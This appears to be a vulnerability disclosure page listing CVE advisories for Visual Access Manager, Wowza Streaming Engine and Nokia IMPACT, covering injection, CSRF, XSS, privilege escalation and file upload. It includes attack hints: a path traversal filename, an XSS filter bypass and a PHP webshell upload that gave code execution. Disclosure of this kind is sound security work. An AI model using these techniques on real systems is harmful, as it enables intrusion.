CVSv3: 8.8
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
A user with valid credentials is able to create and write XML files on the filesystem via the web interface. The PHP page does not check the parameter that identifies the file name to be created. Thus, an attacker can manipulate the file name to create any type of file within the filesystem.
Vulnerability Description: Multiple Cross-Site request forgery pre authentication
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19987
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they are currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. This vulnerability has been found in several pages. An attacker can exploit it in functionalities such as change password, add user, add privileges and so on.
Vulnerability Description: SQL Injection Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19986
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
An attacker without authentication is able to execute arbitrary SQL statements by injecting into HTTP POST/GET parameters of the PHP web page.
Vulnerability Description: Pre-Auth Cross Site Scripting
Software Version: Wowza Streaming Engine < 4.x.x
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19456
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
A Reflected XSS was found in the server selection box inside the login page at:
http://[host]/enginemanager/loginfailed.html
Vulnerability Description: Local Privilege Escalation
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19455
CVSv3: 7.8
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli
A local privilege escalation was found in the Linux version of the server. A user can write arbitrary commands into any file in /usr/local/WowzaStreamingEngine/manager/bin/, since these files are writable by anyone and are executed as root when the server starts or stops.
Vulnerability Description: Arbitrary File Download
Software Version: Wowza Streaming Engine < 4.x.x
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19454
CVSv3: 7.5
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli
An arbitrary file download was found in the "Download Log" functionality at
https://[host]/enginemanager/server/logs/download
Vulnerability Description: Stored XSS
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19453
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
An authenticated user with access to the proxy license editing is able to insert a malicious payload that will be triggered in the main page of the server settings.
Vulnerability Description: Path Traversal
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17406
CVSv3: 5.3
Severity: Medium
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
An authenticated user with access to the CDP component of NOKIA IMPACT is able to save files in arbitrary locations on the filesystem. This vulnerability was found in a feature of the system that allows loading multiple devices by uploading a properly formatted CSV file.
The filename parameter is vulnerable to path traversal: by naming the file with a relative path, an attacker is able to save it to an arbitrary location on the filesystem (e.g. ../../../../../../../tmp/myfile.csv).
Vulnerability Description: Cross Site Scripting
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17405
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
A Self-Reflected Cross Site Scripting was found in the Manual Page of Nokia CDP at https://[host]/ui/help/en_US/[redacted]ConsoleHelp/index
The payload used is shown in the accompanying image.
There is a filter on the input that removes the "." character, but we managed to bypass it by accessing cookie as a key of document.
Vulnerability Description: Full Path Disclosure
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17404
CVSv3: 4.3
Severity: Medium
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
An authenticated user with access to the CDP component of NOKIA IMPACT is able to leak the full path of the installation. In particular, the massive device upload feature (deviceImport) discloses detailed information about the location where the files are saved within the application filesystem.
If the path traversal is exploited to point to a non-existent path, the application throws an unhandled exception that leaks the full path where the files are saved (full path disclosure).
Vulnerability Description: Unrestricted File Upload
Software Version: NOKIA IMPACT < 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-17403
CVSv3: 8.8
Severity: High
Credits: Francesco Giordano, Alessandro Sabetta, Massimiliano Brolli
An authenticated user with access to the CDP component of NOKIA IMPACT is able to upload files with arbitrary extensions.
The deviceImport function parses every file received with a csv_parse function. We managed to load a non-CSV file by adding the following line at the beginning of it, followed by our payload.
We uploaded a PHP webshell to a path served by Apache (in our case /opt/[redacted]/5/) and got code execution as the apache user.